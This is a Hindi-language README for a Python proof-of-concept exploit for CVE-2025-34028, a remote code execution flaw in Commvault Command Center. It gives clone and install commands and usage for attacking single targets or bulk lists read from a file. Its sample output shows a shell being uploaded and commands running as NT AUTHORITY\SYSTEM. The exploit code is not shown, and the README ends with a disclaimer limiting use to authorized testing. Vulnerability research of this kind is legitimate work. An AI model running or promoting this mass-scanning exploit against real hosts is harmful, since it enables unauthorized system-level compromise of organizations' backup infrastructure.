
Proof-of-Concept (PoC) के लिए CVE-2025-34028, Commvault Command Center में एक Remote Code Execution कमजोरी। यह Python स्क्रिप्ट एकल या एकाधिक लक्ष्यों को स्कैन करता है, कमांड निष्पादित करता है, और कमजोर होस्ट्स की रिपोर्ट करता है।
CVE-2025-34028 के लिए एक Python एक्सप्लॉइट, Commvault Command Center में दूरस्थ कोड निष्पादन भेद्यता। यह उपकरण एकल लक्ष्यों का परीक्षण या एकाधिक होस्टों को थोक में स्कैन करने की अनुमति देता है।
git clone https://github.com/Mattb709/CVE-2025-34028-Commvault
cd CVE-2025-34028-Commvault
pip install -r requirements.txt
आवश्यकताएँ स्थापित करें:
pip install requests tabulate
usage: CVE-2025-34028-Commvault.py [-h] (-t TARGET | -f TARGETS_FILE)
CVE-2025-34028 Commvault RCE Exploit
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Single target URL (e.g., https://192.168.1.100:8000)
-f TARGETS_FILE, --file TARGETS_FILE
File containing multiple targets, one per line
एकल लक्ष्य का परीक्षण करें:
python CVE-2025-34028-Commvault.py -t https://commvault.example.com:8000
फ़ाइल से एकाधिक लक्ष्य स्कैन करें:
python CVE-2025-34028-Commvault.py -f targets.txt
लक्ष्य फ़ाइल में प्रति पंक्ति एक लक्ष्य होना चाहिए, इस प्रारूप में:
https://host:port
http://ip
उदाहरण targets.txt:
https://cv.company.com:8000
http://192.168.1.100
https://10.10.10.5:443
स्क्रिप्ट प्रदान करती है:
नमूना आउटपुट:
CVE-2025-34028 Commvault RCE PoC
[1] Processing target: https://cvtest.example.com:8000
[1] [+] Valid Commvault instance detected
[1] [+] Shell uploaded successfully
[1] [+] System User: NT AUTHORITY\SYSTEM
[+] Results Summary
+---------+------------------------------+---------------------+------------------+
| Index | URL | Status | System User |
+---------+------------------------------+---------------------+------------------+
| 1 | https://cvtest.example.com:8000 | RCE Successful | NT AUTHORITY\SYSTEM |
+---------+------------------------------+---------------------+------------------+
यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। लेखक इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें।